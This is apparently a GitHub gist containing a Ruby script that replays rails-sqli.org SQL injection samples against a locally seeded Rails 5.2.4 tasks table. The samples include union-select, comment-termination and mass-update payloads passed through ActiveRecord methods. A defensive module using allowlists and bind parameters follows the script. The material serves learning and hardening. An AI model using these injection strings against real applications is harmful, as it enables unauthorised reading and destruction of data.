@ta1kt0me
Created July 14, 2020 12:18
Sample script that runs SQL injection through Rails
# Try the ActiveRecord-based SQL injection samples, following https://rails-sqli.org/
# Tested on Rails 5.2.4
# I could not try every sample: for delete_all and destroy_all, among others, there is no longer a way to pass arguments.
#
# db/seeds.rb
# (1..100).each do |i|
#   Task.create(name: "task_#{i}")
# end
#
# Run db:seed, then run the script below
# Checked against the Rails 5.0 examples on https://rails-sqli.org/
puts "### calculate"
p Task.calculate(:sum, :id)
query = "id) FROM tasks where name = 'task_1'; -- "
p Task.calculate(:sum, query)
puts
# https://stackoverflow.com/a/23066966
puts "### exists?"
p Task.count
query = ["1"]
p Task.exists?(query)
p Task.count
puts
# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/FinderMethods.html#method-i-find_by
puts "### find_by"
p Task.count
query = "name = 'task_5'"
p Task.find_by(query)
p Task.count
puts
# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/QueryMethods.html#method-i-from
puts "### from"
p Task.count
query = "tasks where 1 = 1; --"
p Task.from(query).where(name: 'task_5')
p Task.count
puts
# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/QueryMethods.html#method-i-group
puts "### group"
p Task.count
query = "name union select * from tasks"
p Task.where(name: 'task_5').group(query)
p Task.count
puts
# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/QueryMethods.html#method-i-having
puts "### having"
p Task.count
query = "1) union select * from tasks -- "
p Task.where(name: 'task_5').group(:name).having("id > #{query}")
p Task.count
puts
# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/QueryMethods.html#method-i-joins
puts "### joins"
p Task.count
query = " -- "
p Task.joins(query).limit(3)
p Task.count
puts
# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/QueryMethods.html#method-i-order
puts "### order"
p Task.count
query = "(case substr(name, 1, 1) when 'a' then 0 else 1 end)"
p Task.order("#{query} asc")
p Task.count
puts
# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/Calculations.html#method-i-pluck
puts "### pluck"
p Task.count
query = "name from tasks; --"
p Task.where(name: 'task_5').pluck(query)
p Task.count
puts
# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/QueryMethods.html#method-i-select
puts "### select"
p Task.count
query = "* from tasks; --"
p Task.where(name: 'task_5').select(query)
p Task.count
puts
# https://api.rubyonrails.org/v5.0.7/classes/ActiveRecord/Relation.html#method-i-update_all
puts "### update_all"
p Task.count
query = "task_xxx' where 1 = 1; -- "
p Task.where(name: 'task_5').update_all("name = '#{query}'")
p Task.where(name: 'task_xxx').count
puts
# https://api.rubyonrails.org/v5.0.2/classes/ActiveRecord/Relation.html#method-i-destroy_all
# In 5.2.0 there is no way to pass arguments in the first place
# puts "### destroy"
#
# p Task.count
#
# query = "1 or 1 = 1 ) -- "
# byebug
# p Task.destroy_all(["#{query}"], nil).to_sql
# p Task.count
#
# puts
# Same as destroy_all: in 5.2.0 there is no way to pass arguments in the first place
# puts "### where and delete"
#
# p Task.count
#
# query = "1) or 1 = 1-- "
# Task.where("id = #{query}").delete_all
# p Task.count
#
# puts
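An added example, not part of the gist or of Rails itself: the defensive counterpart of the calls above. It builds the order, pluck/group, having and where arguments from untrusted input with an allowlist and bind parameters, so the strings this script injects are either refused or bound as plain values. The `tasks` column list and the `SafeTaskQuery` name are assumptions.

```ruby
# Added example (not from the gist): build the arguments for order/pluck/group/
# having/where from untrusted input so that no raw SQL string reaches them.
# Each method returns the value you would hand to Task.order(...), Task.pluck(...),
# Task.group(...), Task.having(...) or Task.where(...); no database is needed here.
module SafeTaskQuery
  # Assumed schema of the `tasks` table: the columns callers may sort, group or pluck by.
  ALLOWED_COLUMNS = %w[id name created_at].freeze
  ALLOWED_DIRECTIONS = %w[asc desc].freeze

  # Returns e.g. { name: :asc }. ActiveRecord quotes hash keys as identifiers,
  # so there is no string for the "(case substr(name, 1, 1) ...)" input to ride on.
  def self.order_arg(column, direction = "asc")
    col = column.to_s.downcase
    dir = direction.to_s.downcase
    unless ALLOWED_COLUMNS.include?(col) && ALLOWED_DIRECTIONS.include?(dir)
      raise ArgumentError, "refused order input: #{column.inspect} #{direction.inspect}"
    end
    { col.to_sym => dir.to_sym }
  end

  # Returns an array of column symbols for pluck/group/select; symbols are quoted
  # as identifiers, unlike the "name from tasks; --" string in the gist.
  def self.column_args(columns)
    cols = Array(columns).map { |c| c.to_s.downcase }
    unknown = cols - ALLOWED_COLUMNS
    raise ArgumentError, "refused column input: #{unknown.inspect}" unless unknown.empty?
    cols.map(&:to_sym)
  end

  # Returns the bind-parameter form for a numeric threshold in having/where:
  # ["id > ?", 5] instead of "id > #{query}". Anything that is not a base-10
  # integer is refused before it can reach SQL.
  def self.id_above_arg(raw)
    ["id > ?", Integer(raw.to_s, 10)]
  rescue ArgumentError
    raise ArgumentError, "refused numeric input: #{raw.inspect}"
  end

  # Hash conditions for where/find_by/exists?: the value is bound, so
  # "task_xxx' where 1 = 1; -- " stays an ordinary string compared against name.
  def self.name_eq_arg(value)
    { name: value.to_s }
  end
end
```

Rails 6.0 raises `ActiveRecord::UnknownAttributeReference` when `order` or `pluck` receives a non-attribute string that is not wrapped in `Arel.sql`; an allowlist like this is what any such wrapping should be gated on.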